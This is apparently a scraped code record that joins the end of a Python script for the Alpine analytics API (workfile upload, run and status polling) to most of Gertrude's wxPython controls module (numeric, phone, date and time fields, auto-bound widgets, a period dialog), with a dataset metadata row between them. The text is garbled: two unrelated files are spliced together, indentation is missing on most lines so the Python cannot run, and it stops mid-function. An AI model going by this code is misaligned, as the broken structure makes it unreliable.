sample_title, sample_deparment, admin_role=sample_admin_type, app_role=sample_user_type)
member_list = alpine_session.workspace.member.add(workspace_id, user_info['id'], sample_member_role)
# Workflow Examples
afm_path = "afm/demo_hadoop_row_filter_regression.afm"
try:
workfile_id = alpine_session.workfile.get_id("demo_hadoop_row_filter_regression", workspace_id)
alpine_session.workfile.delete(workfile_id)
except WorkfileNotFoundException:
pass
datasource_info = [{"data_source_type": alpine_session.datasource.dsType.HadoopCluster,
"data_source_id": hadoop_data_source_id
}]
workfile_info = alpine_session.workfile.upload(workspace_info['id'], afm_path, datasource_info)
print("Uploaded Workfile Info: {0}".format(workfile_info))
variables = [{"name": "@min_credit_line", "value": "7"}]
process_id = alpine_session.workfile.process.run(workfile_info['id'], variables)
workfile_status = None
    max_polls = 100  # poll every 10 seconds, i.e. wait up to ~1000 seconds in total
    for i in range(0, max_polls):
        workfile_status = alpine_session.workfile.process.query_status(process_id)
        if workfile_status in ["WORKING"]:
            time.sleep(10)
        elif workfile_status == "FINISHED":
            print("Workfile finished after waiting for {0} seconds".format(i*10))
            break
        else:
            raise RunFlowFailureException("Workflow ran into unexpected stage: {0}".format(workfile_status))
    if workfile_status != "FINISHED":
        raise RunFlowFailureException("Run flow not finished after running for {0} seconds"
                                      .format(max_polls*10))
    # Use the tearDown function to delete the datasource if needed
# tearDown(alpine_host, alpine_port, username, password)
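
# Example invocation (placeholder values), matching the key=value argv
# parsing in __main__ below:
#
#   python workfile.py host=alpine.example.com port=8080 user=admin password=secret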
if __name__ == '__main__':
self = sys.modules['__main__']
if len(sys.argv) >= 5:
host = sys.argv[1].split('=')[1]
port = sys.argv[2].split('=')[1]
username = sys.argv[3].split('=')[1]
password = sys.argv[4].split('=')[1]
        main(host, port, username, password)
else:
help() | mit | -3,272,726,833,132,391,400 | 47.431193 | 133 | 0.6176 | false | 3.844501 | false | false | false |
studio1247/gertrude | controls.py | 1 | 45793 | # -*- coding: utf-8 -*-
# This file is part of Gertrude.
#
# Gertrude is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Gertrude is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Gertrude; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from __future__ import print_function
import wx
import wx.lib
import wx.lib.scrolledpanel
import wx.lib.masked
import wx.lib.stattext
import wx.combo
from wx.lib.masked import Field
from helpers import *
from functions import *
from config import config
from history import Change, Insert, Delete
class GPanel(wx.Panel):
def __init__(self, parent, title):
wx.Panel.__init__(self, parent, style=wx.LB_DEFAULT)
self.sizer = wx.BoxSizer(wx.VERTICAL)
sizer = wx.BoxSizer(wx.HORIZONTAL)
if sys.platform == 'win32':
st = wx.StaticText(self, -1, title, size=(-1, 24), style=wx.BORDER_SUNKEN | wx.ST_NO_AUTORESIZE)
font = wx.Font(12, wx.SWISS, wx.NORMAL, wx.BOLD)
else:
st = wx.lib.stattext.GenStaticText(self, -1, ' ' + title, size=(-1, 28),
style=wx.BORDER_SUNKEN | wx.ST_NO_AUTORESIZE)
font = st.GetFont()
font.SetPointSize(14)
st.SetFont(font)
st.SetBackgroundColour(wx.Colour(10, 36, 106))
st.SetBackgroundStyle(wx.BG_STYLE_COLOUR)
st.SetForegroundColour(wx.Colour(255, 255, 255))
sizer.Add(st, 1, wx.EXPAND)
self.sizer.Add(sizer, 0, wx.EXPAND | wx.ALIGN_CENTER_VERTICAL | wx.BOTTOM, 5)
self.SetSizer(self.sizer)
self.SetAutoLayout(1)
def UpdateContents(self):
pass
class NumericCtrl(wx.TextCtrl):
def __init__(self, parent, id=-1, value="", min=None, max=None, precision=3, action_kw={}, *args, **kwargs):
self.__digits = '0123456789.-'
self.__prec = precision
self.format = '%.' + str(self.__prec) + 'f'
self.__val = 0
self.__min, self.__max = None, None
if max is not None:
self.__max = float(max)
if min is not None:
self.__min = float(min)
wx.TextCtrl.__init__(self, parent, id, value=value, *args, **kwargs)
self.Bind(wx.EVT_CHAR, self.onChar)
def SetPrecision(self, p):
self.__prec = p
self.format = '%.' + str(self.__prec) + 'f'
def onChar(self, event):
""" on Character event"""
key = event.KeyCode
entry = wx.TextCtrl.GetValue(self).strip()
# 2. other non-text characters are passed without change
if key < wx.WXK_SPACE or key == wx.WXK_DELETE or key > 255:
event.Skip()
return
# 3. check for multiple '.' and out of place '-' signs and ignore these
# note that chr(key) will now work due to return at #2
pos = wx.TextCtrl.GetSelection(self)[0]
has_minus = '-' in entry
if ((chr(key) == '.' and (self.__prec == 0 or '.' in entry)) or
(chr(key) == '-' and (has_minus or pos != 0 or (self.__min is not None and self.__min >= 0))) or
(chr(key) != '-' and has_minus and pos == 0)):
return
# 4. allow digits, but not other characters
if chr(key) in self.__digits:
event.Skip()
return
def GetValue(self):
if wx.TextCtrl.GetValue(self) == "":
return None
elif self.__prec > 0:
return float(wx.TextCtrl.GetValue(self))
else:
return int(wx.TextCtrl.GetValue(self))
# def __Text_SetValue(self,value):
def SetValue(self, value):
if value != "":
wx.TextCtrl.SetValue(self, self.format % float(value))
else:
wx.TextCtrl.SetValue(self, "")
self.Refresh()
def GetMin(self):
return self.__min
def GetMax(self):
return self.__max
def SetMin(self, min):
try:
self.__min = float(min)
except:
pass
return self.__min
def SetMax(self, max):
try:
self.__max = float(max)
except:
pass
return self.__max
PHONECTRL_WIDTH = 0
class PhoneCtrl(wx.TextCtrl):
def __init__(self, parent, id, value=None, action_kw={}, *args, **kwargs):
global PHONECTRL_WIDTH
self.__digits = '0123456789'
# this_sty = wx.TAB_TRAVERSAL| wx.TE_PROCESS_ENTER
kw = kwargs
wx.TextCtrl.__init__(self, parent.GetWindow(), id, size=(-1, -1), *args, **kw)
self.SetMaxLength(14)
if PHONECTRL_WIDTH == 0:
dc = wx.WindowDC(self)
PHONECTRL_WIDTH = dc.GetMultiLineTextExtent("00 00 00 00 00", self.GetFont())[0]
self.SetMinSize((PHONECTRL_WIDTH + 15, -1))
wx.EVT_CHAR(self, self.onChar)
wx.EVT_TEXT(self, -1, self.checkSyntax)
wx.EVT_LEFT_DOWN(self, self.OnLeftDown)
def onChar(self, event):
""" on Character event"""
ip = self.GetInsertionPoint()
lp = self.GetLastPosition()
key = event.KeyCode
# 2. other non-text characters are passed without change
if key == wx.WXK_BACK:
if ip > 0:
self.RemoveChar(ip - 1)
return
if key < wx.WXK_SPACE or key == wx.WXK_DELETE or key > 255:
event.Skip()
wx.CallAfter(self.Arrange, key)
return
# 4. allow digits, but not other characters
if chr(key) in self.__digits:
event.Skip()
wx.CallAfter(self.Arrange, key)
def checkSyntax(self, event=None):
value = self.GetValue()
if value != "" and len(value) != 14:
self.SetBackgroundColour(wx.RED)
else:
self.SetBackgroundColour(wx.WHITE)
self.Refresh()
event.Skip()
def Arrange(self, key):
ip = self.GetInsertionPoint()
lp = self.GetLastPosition()
sel = self.GetSelection()
value = self.GetValue()
tmp = self.GetValue().replace(" ", "")
arranged = ""
for c in tmp:
if c in self.__digits:
arranged += c
if len(arranged) < 14 and len(arranged) % 3 == 2:
arranged += " "
else:
ip -= 1
if arranged != value:
self.SetValue(arranged)
if sel == (ip, ip) or arranged != value:
if (ip == len(arranged) or arranged[ip] != " "):
self.SetInsertionPoint(ip)
elif key == wx.WXK_LEFT:
self.SetInsertionPoint(ip - 1)
else:
self.SetInsertionPoint(ip + 1)
def RemoveChar(self, index):
value = self.GetValue()
if value[index] == " ":
value = value[:index - 1] + value[index + 1:]
index -= 1
else:
value = value[:index] + value[index + 1:]
self.SetValue(value)
self.SetInsertionPoint(index)
self.Arrange(wx.WXK_BACK)
def OnLeftDown(self, event):
if event.LeftDown():
event.Skip()
wx.CallAfter(self.OnCursorMoved, event)
def OnCursorMoved(self, event):
ip = self.GetInsertionPoint()
if ip < 14 and ip % 3 == 2:
self.SetInsertionPoint(ip + 1)
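
# Behaviour sketch: PhoneCtrl reformats digits as they are typed, so
# entering "0601020304" displays as "06 01 02 03 04" (digit pairs separated
# by spaces, 14 characters maximum).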
if 0: # sys.platform == 'win32':
class DateCtrl(wx.GenericDatePickerCtrl):
def SetValue(self, date):
if date is None:
date = wx.DefaultDateTime
if isinstance(date, (datetime.datetime, datetime.date)):
tt = date.timetuple()
dmy = (tt[2], tt[1] - 1, tt[0])
date = wx.DateTimeFromDMY(*dmy)
wx.GenericDatePickerCtrl.SetValue(self, date)
def GetValue(self):
date = wx.GenericDatePickerCtrl.GetValue(self)
if date.IsValid():
ymd = map(int, date.FormatISODate().split('-'))
return datetime.date(*ymd)
else:
return None
else:
DATECTRL_WIDTH = 0
class DateCtrl(wx.TextCtrl):
def __init__(self, parent, id=-1, value=None, mois=False, *args, **kwargs):
global DATECTRL_WIDTH
self.mois = mois
            wx.TextCtrl.__init__(self, parent, id=id, *args, **kwargs)
if DATECTRL_WIDTH == 0:
dc = wx.WindowDC(self)
DATECTRL_WIDTH = dc.GetMultiLineTextExtent("00/00/0000 ", self.GetFont())[0]
self.SetMinSize((DATECTRL_WIDTH + 10, -1))
wx.EVT_TEXT(self, -1, self.checkSyntax)
if value is not None:
self.SetValue(value)
def checkSyntax(self, event=None):
str = wx.TextCtrl.GetValue(self)
if str == "":
self.SetBackgroundColour(wx.WHITE)
elif self.mois and (
str.lower() in [m.lower() for m in months] or (str.isdigit() and int(str) in range(1, 13))):
self.SetBackgroundColour(wx.WHITE)
else:
if self.mois:
r = str2date(str, day=1)
else:
r = str2date(str)
if r:
self.SetBackgroundColour(wx.WHITE)
else:
self.SetBackgroundColour(wx.RED)
self.Refresh()
event.Skip()
def GetValue(self):
if self.mois:
return wx.TextCtrl.GetValue(self)
elif wx.TextCtrl.GetValue(self) == "":
return None
else:
return str2date(wx.TextCtrl.GetValue(self))
def SetValue(self, value):
if value is None:
wx.TextCtrl.SetValue(self, '')
elif self.mois:
wx.TextCtrl.SetValue(self, value)
else:
wx.TextCtrl.SetValue(self, '%.02d/%.02d/%.04d' % (value.day, value.month, value.year))
self.Refresh()
class TimeCtrl(wx.lib.masked.TimeCtrl):
def __init__(self, parent):
self.spin = wx.SpinButton(parent, -1, wx.DefaultPosition, (-1, 10), wx.SP_VERTICAL)
self.spin.SetRange(-100000, +100000)
self.spin.SetValue(0)
wx.lib.masked.TimeCtrl.__init__(self, parent, id=-1, fmt24hr=True, display_seconds=False, spinButton=self.spin)
def SetParameters(self, **kwargs):
"""
Function providing access to the parameters governing TimeCtrl display and bounds.
"""
maskededit_kwargs = {}
reset_format = False
if kwargs.has_key('display_seconds'):
kwargs['displaySeconds'] = kwargs['display_seconds']
del kwargs['display_seconds']
if kwargs.has_key('format') and kwargs.has_key('displaySeconds'):
del kwargs['displaySeconds'] # always apply format if specified
# assign keyword args as appropriate:
for key, param_value in kwargs.items():
if key not in TimeCtrl.valid_ctrl_params.keys():
raise AttributeError('invalid keyword argument "%s"' % key)
if key == 'format':
wxdt = wx.DateTimeFromDMY(1, 0, 1970)
try:
if wxdt.Format('%p') != 'AM':
require24hr = True
else:
require24hr = False
except:
require24hr = True
# handle both local or generic 'maskededit' autoformat codes:
if param_value == 'HHMMSS' or param_value == 'TIMEHHMMSS':
self.__displaySeconds = True
self.__fmt24hr = False
elif param_value == 'HHMM' or param_value == 'TIMEHHMM':
self.__displaySeconds = False
self.__fmt24hr = False
elif param_value == '24HHMMSS' or param_value == '24HRTIMEHHMMSS':
self.__displaySeconds = True
self.__fmt24hr = True
elif param_value == '24HHMM' or param_value == '24HRTIMEHHMM':
self.__displaySeconds = False
self.__fmt24hr = True
else:
raise AttributeError('"%s" is not a valid format' % param_value)
if require24hr and not self.__fmt24hr:
raise AttributeError('"%s" is an unsupported time format for the current locale' % param_value)
reset_format = True
elif key in ("displaySeconds", "display_seconds") and not kwargs.has_key('format'):
self.__displaySeconds = param_value
reset_format = True
elif key == "min":
min = param_value
elif key == "max":
max = param_value
elif key == "limited":
limited = param_value
elif key == "useFixedWidthFont":
maskededit_kwargs[key] = param_value
elif key == "oob_color":
maskededit_kwargs['invalidBackgroundColor'] = param_value
if reset_format:
if self.__fmt24hr:
if self.__displaySeconds:
maskededit_kwargs['autoformat'] = '24HRTIMEHHMMSS'
else:
maskededit_kwargs['autoformat'] = '24HRTIMEHHMM'
# Set hour field to zero-pad, right-insert, require explicit field change,
# select entire field on entry, and require a resultant valid entry
# to allow character entry:
hourfield = Field(formatcodes='0r<SV', validRegex='0\d|1\d|2[0123]', validRequired=True)
else:
if self.__displaySeconds:
maskededit_kwargs['autoformat'] = 'TIMEHHMMSS'
else:
maskededit_kwargs['autoformat'] = 'TIMEHHMM'
# Set hour field to allow spaces (at start), right-insert,
# require explicit field change, select entire field on entry,
# and require a resultant valid entry to allow character entry:
hourfield = Field(formatcodes='_0<rSV', validRegex='0[1-9]| [1-9]|1[012]', validRequired=True)
ampmfield = Field(formatcodes='S', emptyInvalid=True, validRequired=True)
# Field 1 is always a zero-padded right-insert minute field,
# similarly configured as above:
            minutefield = Field(formatcodes='0r<SV', validRegex='[0-5][05]', validRequired=True)
fields = [hourfield, minutefield]
if self.__displaySeconds:
fields.append(copy.copy(minutefield)) # second field has same constraints as field 1
if not self.__fmt24hr:
fields.append(ampmfield)
# set fields argument:
maskededit_kwargs['fields'] = fields
# This allows range validation if set
maskededit_kwargs['validFunc'] = self.IsInBounds
# This allows range limits to affect insertion into control or not
# dynamically without affecting individual field constraint validation
maskededit_kwargs['retainFieldValidation'] = True
if hasattr(self, 'controlInitialized') and self.controlInitialized:
self.SetCtrlParameters(**maskededit_kwargs) # set appropriate parameters
# self.SetBounds("00:00", "23:55")
# Validate initial value and set if appropriate
try:
self.SetBounds(min, max)
self.SetLimited(limited)
self.SetValue(value)
except:
self.SetValue('00:00:00')
return {} # no arguments to return
else:
return maskededit_kwargs
def __IncrementValue(self, key, pos):
text = self.GetValue()
field = self._FindField(pos)
start, end = field._extent
slice = text[start:end]
if key == wx.WXK_UP:
increment = 1
else:
increment = -1
if slice in ('A', 'P'):
if slice == 'A':
newslice = 'P'
elif slice == 'P':
newslice = 'A'
newvalue = text[:start] + newslice + text[end:]
elif field._index == 0:
# adjusting this field is trickier, as its value can affect the
# am/pm setting. So, we use wxDateTime to generate a new value for us:
# (Use a fixed date not subject to DST variations:)
converter = wx.DateTimeFromDMY(1, 0, 1970)
converter.ParseTime(text.strip())
currenthour = converter.GetHour()
newhour = (currenthour + increment) % 24
converter.SetHour(newhour)
newvalue = converter # take advantage of auto-conversion for am/pm in .SetValue()
else: # minute or second field; handled the same way:
increment *= 5
newslice = "%02d" % ((int(slice) + increment) % 60)
newvalue = text[:start] + newslice + text[end:]
try:
self.SetValue(newvalue)
except ValueError: # must not be in bounds:
if not wx.Validator_IsSilent():
wx.Bell()
class AutoMixin:
default = None
def __init__(self, parent, instance, member, fixed_instance=False, observers=[], mask=None):
self.__ontext = True
self.parent = parent
self.fixed_instance = fixed_instance
self.observers = observers
self.mask = mask
if not fixed_instance:
parent.ctrls.append(self)
self.SetInstance(instance, member)
self.Bind(wx.EVT_TEXT, self.onText)
def __del__(self):
if not self.fixed_instance:
self.parent.ctrls.remove(self)
def SetInstance(self, instance, member=None):
self.instance = instance
if member:
self.member = member
self.UpdateContents()
def GetCurrentValue(self):
if self.mask:
return eval('self.instance.%s & self.mask' % self.member)
else:
return eval('self.instance.%s' % self.member)
def UpdateContents(self):
if not self.instance:
self.Disable()
else:
self.__ontext = False
try:
value = self.GetCurrentValue()
self.SetValue(self.default if value is None else value)
except Exception as e:
print("Erreur lors de l'evaluation de self.instance.%s" % self.member, e)
self.__ontext = True
self.Enable(not config.readonly)
def onText(self, event):
obj = event.GetEventObject()
if self.__ontext:
self.AutoChange(obj.GetValue())
event.Skip()
def AutoChange(self, new_value):
old_value = eval('self.instance.%s' % self.member)
if self.mask is not None:
new_value |= old_value & ~self.mask
if old_value != new_value:
last = history.Last()
if last is not None and len(last) == 1 and isinstance(last[-1], Change):
if last[-1].instance is not self.instance or last[-1].member != self.member:
history.Append(Change(self.instance, self.member, old_value))
else:
history.Append(Change(self.instance, self.member, old_value))
exec ('self.instance.%s = new_value' % self.member)
for o in self.observers:
counters[o] += 1
class AutoTextCtrl(wx.TextCtrl, AutoMixin):
default = ""
def __init__(self, parent, instance, member, fixed_instance=False, observers=[], *args, **kwargs):
wx.TextCtrl.__init__(self, parent.GetWindow(), -1, *args, **kwargs)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
def __del__(self):
AutoMixin.__del__(self)
class AutoComboBox(wx.ComboBox, AutoMixin):
def __init__(self, parent, instance, member, fixed_instance=False, observers=[], *args, **kwargs):
wx.ComboBox.__init__(self, parent.GetWindow(), -1, *args, **kwargs)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
def __del__(self):
AutoMixin.__del__(self)
class AutoDateCtrl(DateCtrl, AutoMixin):
default = None
def __init__(self, parent, instance, member, fixed_instance=False, observers=[], *args, **kwargs):
DateCtrl.__init__(self, parent.GetWindow(), id=-1,
style=wx.DP_DEFAULT | wx.DP_DROPDOWN | wx.DP_SHOWCENTURY | wx.DP_ALLOWNONE, *args, **kwargs)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
# self.Bind(wx.EVT_DATE_CHANGED, self.onText, self)
# DateCtrl.__init__(self, parent, -1, *args, **kwargs)
# AutoMixin.__init__(self, parent, instance, member)
def __del__(self):
AutoMixin.__del__(self)
class AutoTimeCtrl(TimeCtrl, AutoMixin):
def __init__(self, parent, instance, member, fixed_instance=False, observers=[], *args, **kwargs):
TimeCtrl.__init__(self, parent)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
self.SetMin("05:00")
def __del__(self):
AutoMixin.__del__(self)
def SetValue(self, value):
if isinstance(value, float):
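# a float is interpreted as decimal hours, e.g. 7.5 becomes "07:30"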
wx.lib.masked.TimeCtrl.SetValue(self, "%02d:%02d" % (int(value), round((value - int(value)) * 60)))
else:
wx.lib.masked.TimeCtrl.SetValue(self, value)
def onText(self, event):
value = self.GetValue()
try:
self.AutoChange(float(value[:2]) + float(value[3:5]) / 60)
except:
pass
event.Skip()
class AutoNumericCtrl(NumericCtrl, AutoMixin):
default = ""
def __init__(self, parent, instance, member, fixed_instance=False, observers=[], *args, **kwargs):
NumericCtrl.__init__(self, parent.GetWindow(), *args, **kwargs)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
def __del__(self):
AutoMixin.__del__(self)
class AutoPhoneCtrl(PhoneCtrl, AutoMixin):
default = ""
def __init__(self, parent, instance, member, fixed_instance=False, observers=[], *args, **kwargs):
PhoneCtrl.__init__(self, parent, -1, *args, **kwargs)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
def __del__(self):
AutoMixin.__del__(self)
if sys.platform == "win32":
class ChoiceWithoutScroll(wx.Choice):
def onMouseWheel(self, event):
pass
def __init__(self, *args, **kwargs):
wx.Choice.__init__(self, *args, **kwargs)
self.Bind(wx.EVT_MOUSEWHEEL, self.onMouseWheel)
else:
ChoiceWithoutScroll = wx.Choice
class ChoiceCtrl(ChoiceWithoutScroll):
def __init__(self, parent, items=None):
ChoiceWithoutScroll.__init__(self, parent, -1)
if items:
self.SetItems(items)
def SetItems(self, items):
ChoiceWithoutScroll.Clear(self)
for item in items:
if isinstance(item, tuple):
self.Append(item[0], item[1])
else:
self.Append(item, item)
def GetValue(self):
selected = self.GetSelection()
return self.GetClientData(selected)
class AutoChoiceCtrl(ChoiceWithoutScroll, AutoMixin):
def __init__(self, parent, instance, member, items=None, fixed_instance=False, observers=[], mask=None, *args, **kwargs):
ChoiceWithoutScroll.__init__(self, parent, -1, *args, **kwargs)
self.values = {}
if items:
self.SetItems(items)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers, mask)
parent.Bind(wx.EVT_CHOICE, self.onChoice, self)
def __del__(self):
AutoMixin.__del__(self)
def Append(self, item, clientData):
index = ChoiceWithoutScroll.Append(self, item, clientData)
self.values[clientData] = index
def onChoice(self, event):
self.AutoChange(event.GetClientData())
event.Skip()
def SetValue(self, value):
if self.GetCurrentValue() != value:
exec ('self.instance.%s = value' % self.member)
self.UpdateContents()
def UpdateContents(self):
if not self.instance:
self.Disable()
else:
value = self.GetCurrentValue()
if value in self.values:
self.SetSelection(self.values[value])
else:
self.SetSelection(-1)
self.Enable(not config.readonly)
def SetItems(self, items):
ChoiceWithoutScroll.Clear(self)
self.values.clear()
for item in items:
if isinstance(item, tuple):
self.Append(item[0] if item[0] else "", item[1])
else:
self.Append(item if item else "", item)
try:
self.UpdateContents()
except:
pass
class AutoCheckBox(wx.CheckBox, AutoMixin):
def __init__(self, parent, instance, member, label="", value=1, fixed_instance=False, observers=[], *args,
**kwargs):
wx.CheckBox.__init__(self, parent, -1, label, *args, **kwargs)
self.value = value
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
parent.Bind(wx.EVT_CHECKBOX, self.EvtCheckbox, self)
def __del__(self):
AutoMixin.__del__(self)
def EvtCheckbox(self, event):
previous_value = eval('self.instance.%s' % self.member)
if event.Checked():
self.AutoChange(previous_value | self.value)
else:
self.AutoChange(previous_value & ~self.value)
def SetValue(self, value):
wx.CheckBox.SetValue(self, value & self.value)
class AutoBinaryChoiceCtrl(ChoiceWithoutScroll, AutoMixin):
def __init__(self, parent, instance, member, items=None, fixed_instance=False, observers=[], *args, **kwargs):
ChoiceWithoutScroll.__init__(self, parent, -1, *args, **kwargs)
self.values = {}
if items:
self.SetItems(items)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
parent.Bind(wx.EVT_CHOICE, self.onChoice, self)
def __del__(self):
AutoMixin.__del__(self)
def Append(self, item, clientData):
index = ChoiceWithoutScroll.Append(self, item, clientData)
self.values[clientData] = index
def onChoice(self, event):
previous_value = eval('self.instance.%s' % self.member)
value = event.GetClientData()
if value:
self.AutoChange(previous_value | self.value)
else:
self.AutoChange(previous_value & ~self.value)
event.Skip()
def SetValue(self, value):
self.UpdateContents()
def UpdateContents(self):
if not self.instance:
self.Disable()
else:
value = eval('self.instance.%s & self.value' % self.member)
if value in self.values:
self.SetSelection(self.values[value])
else:
self.SetSelection(-1)
self.Enable(not config.readonly)
def SetItems(self, items):
ChoiceWithoutScroll.Clear(self)
self.values.clear()
for item, clientData in items:
self.Append(item, clientData)
if clientData:
self.value = clientData
class AutoRadioBox(wx.RadioBox, AutoMixin):
def __init__(self, parent, instance, member, label, choices, fixed_instance=False, observers=[], *args, **kwargs):
wx.RadioBox.__init__(self, parent, -1, label=label, choices=choices, *args, **kwargs)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
parent.Bind(wx.EVT_RADIOBOX, self.EvtRadiobox, self)
def __del__(self):
AutoMixin.__del__(self)
def EvtRadiobox(self, event):
self.AutoChange(event.GetInt())
def SetValue(self, value):
self.SetSelection(value)
class DatePickerCtrl(wx.DatePickerCtrl):
_GetValue = wx.DatePickerCtrl.GetValue
_SetValue = wx.DatePickerCtrl.SetValue
def GetValue(self):
if self._GetValue().IsValid():
return datetime.date(self._GetValue().GetYear(), self._GetValue().GetMonth() + 1, self._GetValue().GetDay())
else:
return None
def SetValue(self, dt):
if dt is None:
self._SetValue(wx.DateTime())
else:
self._SetValue(wx.DateTimeFromDMY(dt.day, dt.month - 1, dt.year))
class TextDialog(wx.Dialog):
def __init__(self, parent, titre, text):
wx.Dialog.__init__(self, parent, -1, titre, wx.DefaultPosition, wx.DefaultSize)
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.textctrl = wx.TextCtrl(self, -1, text, style=wx.TAB_TRAVERSAL | wx.TE_PROCESS_ENTER)
self.Bind(wx.EVT_TEXT_ENTER, self.OnEnter, self.textctrl)
self.sizer.Add(self.textctrl, 0, wx.EXPAND | wx.ALL, 5)
self.btnsizer = wx.StdDialogButtonSizer()
btn = wx.Button(self, wx.ID_OK)
self.btnsizer.AddButton(btn)
btn = wx.Button(self, wx.ID_CANCEL)
self.btnsizer.AddButton(btn)
self.btnsizer.Realize()
self.sizer.Add(self.btnsizer, 0, wx.ALL, 5)
self.SetSizer(self.sizer)
self.sizer.Fit(self)
def GetText(self):
return self.textctrl.GetValue()
def OnEnter(self, _):
self.EndModal(wx.ID_OK)
class PeriodeDialog(wx.Dialog):
def __init__(self, parent, periode):
wx.Dialog.__init__(self, parent, -1, "Modifier une période", wx.DefaultPosition, wx.DefaultSize)
self.periode = periode
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.fields_sizer = wx.FlexGridSizer(0, 2, 5, 10)
self.fields_sizer.AddGrowableCol(1, 1)
self.debut_ctrl = DateCtrl(self)
self.debut_ctrl.SetValue(periode.debut)
self.fields_sizer.AddMany(
[(wx.StaticText(self, -1, "Début :"), 0, wx.ALIGN_CENTRE_VERTICAL | wx.ALL - wx.BOTTOM, 5),
(self.debut_ctrl, 0, wx.EXPAND | wx.ALIGN_CENTRE_VERTICAL | wx.ALL - wx.BOTTOM, 5)])
self.fin_ctrl = DateCtrl(self)
self.fin_ctrl.SetValue(periode.fin)
self.fields_sizer.AddMany([(wx.StaticText(self, -1, "Fin :"), 0, wx.ALIGN_CENTRE_VERTICAL | wx.ALL, 5),
(self.fin_ctrl, 0, wx.EXPAND | wx.ALIGN_CENTRE_VERTICAL | wx.ALL, 5)])
self.sizer.Add(self.fields_sizer, 0, wx.EXPAND | wx.ALL, 5)
self.btnsizer = wx.StdDialogButtonSizer()
btn = wx.Button(self, wx.ID_OK)
self.btnsizer.AddButton(btn)
btn = wx.Button(self, wx.ID_CANCEL)
self.btnsizer.AddButton(btn)
self.btnsizer.Realize()
self.sizer.Add(self.btnsizer, 0, wx.ALL, 5)
self.SetSizer(self.sizer)
self.sizer.Fit(self)
if sys.platform == "darwin":
SIMPLE_BUTTONS_SIZE = (30, 30)
else:
SIMPLE_BUTTONS_SIZE = (-1, -1)
class PeriodeChoice(wx.BoxSizer):
def __init__(self, parent, constructor, default=None, onModify=None):
wx.BoxSizer.__init__(self, wx.HORIZONTAL)
self.parent = parent
self.constructor = constructor
self.onModify = onModify # TODO rather raise events
self.defaultPeriode = default
self.instance = None
self.readonly = False
self.periodechoice = wx.Choice(parent, size=(220, -1))
parent.Bind(wx.EVT_CHOICE, self.EvtPeriodeChoice, self.periodechoice)
delbmp = wx.Bitmap(GetBitmapFile("remove.png"), wx.BITMAP_TYPE_PNG)
plusbmp = wx.Bitmap(GetBitmapFile("plus.png"), wx.BITMAP_TYPE_PNG)
settingsbmp = wx.Bitmap(GetBitmapFile("settings.png"), wx.BITMAP_TYPE_PNG)
self.periodeaddbutton = wx.BitmapButton(parent, -1, plusbmp, size=SIMPLE_BUTTONS_SIZE)
self.periodeaddbutton.SetToolTipString("Ajouter une période")
self.periodedelbutton = wx.BitmapButton(parent, -1, delbmp, size=SIMPLE_BUTTONS_SIZE)
self.periodedelbutton.SetToolTipString("Delete the period")
self.periodesettingsbutton = wx.BitmapButton(parent, -1, settingsbmp, size=SIMPLE_BUTTONS_SIZE)
self.periodesettingsbutton.SetToolTipString("Edit the period")
self.Add(self.periodechoice, 1, wx.EXPAND | wx.LEFT, 5)
self.Add(self.periodeaddbutton, 0, wx.ALIGN_CENTER_VERTICAL | wx.LEFT | wx.RIGHT, 5)
self.Add(self.periodedelbutton, 0, wx.ALIGN_CENTER_VERTICAL | wx.RIGHT, 5)
self.Add(self.periodesettingsbutton, 0, wx.ALIGN_CENTER_VERTICAL)
parent.Bind(wx.EVT_BUTTON, self.EvtPeriodeAddButton, self.periodeaddbutton)
parent.Bind(wx.EVT_BUTTON, self.EvtPeriodeDelButton, self.periodedelbutton)
parent.Bind(wx.EVT_BUTTON, self.EvtPeriodeSettingsButton, self.periodesettingsbutton)
parent.periodechoice = self
def SetInstance(self, instance, periode=None):
self.instance = instance
self.periode = periode
if instance is not None:
self.periodechoice.Clear()
for item in instance:
self.periodechoice.Append(GetPeriodeString(item))
self.Enable()
if periode is not None:
self.periodechoice.SetSelection(periode)
else:
self.Disable()
def EvtPeriodeChoice(self, evt):
ctrl = evt.GetEventObject()
self.periode = ctrl.GetSelection()
self.parent.SetPeriode(self.periode)
self.Enable()
def EvtPeriodeAddButton(self, _):
self.periode = len(self.instance)
new_periode = self.constructor(self.parent)
if len(self.instance) > 0:
last_periode = self.instance[-1]
new_periode.debut = last_periode.fin + datetime.timedelta(1)
if last_periode.debut.day == new_periode.debut.day and last_periode.debut.month == new_periode.debut.month:
new_periode.fin = datetime.date(
last_periode.fin.year + new_periode.debut.year - last_periode.debut.year, last_periode.fin.month,
last_periode.fin.day)
elif self.defaultPeriode:
new_periode.debut = datetime.date(self.defaultPeriode, 1, 1)
new_periode.fin = datetime.date(self.defaultPeriode, 12, 31)
self.instance.append(new_periode)
self.periodechoice.Append(GetPeriodeString(new_periode))
self.periodechoice.SetSelection(self.periode)
self.parent.SetPeriode(self.periode)
history.Append(Delete(self.instance, -1))
self.Enable()
def EvtPeriodeDelButton(self, evt):
dlg = wx.MessageDialog(self.parent,
"Cette période va être supprimée, confirmer ?",
"Confirmation",
wx.YES_NO | wx.NO_DEFAULT | wx.ICON_EXCLAMATION)
if dlg.ShowModal() == wx.ID_YES:
index = self.periodechoice.GetSelection()
periode = self.instance[index]
history.Append(Insert(self.instance, index, periode))
del self.instance[index]
self.periodechoice.Delete(index)
self.periode = len(self.instance) - 1
self.periodechoice.SetSelection(self.periode)
self.parent.SetPeriode(self.periode)
self.Enable()
def EvtPeriodeSettingsButton(self, _):
periode = self.instance[self.periode]
dlg = PeriodeDialog(self.parent, periode)
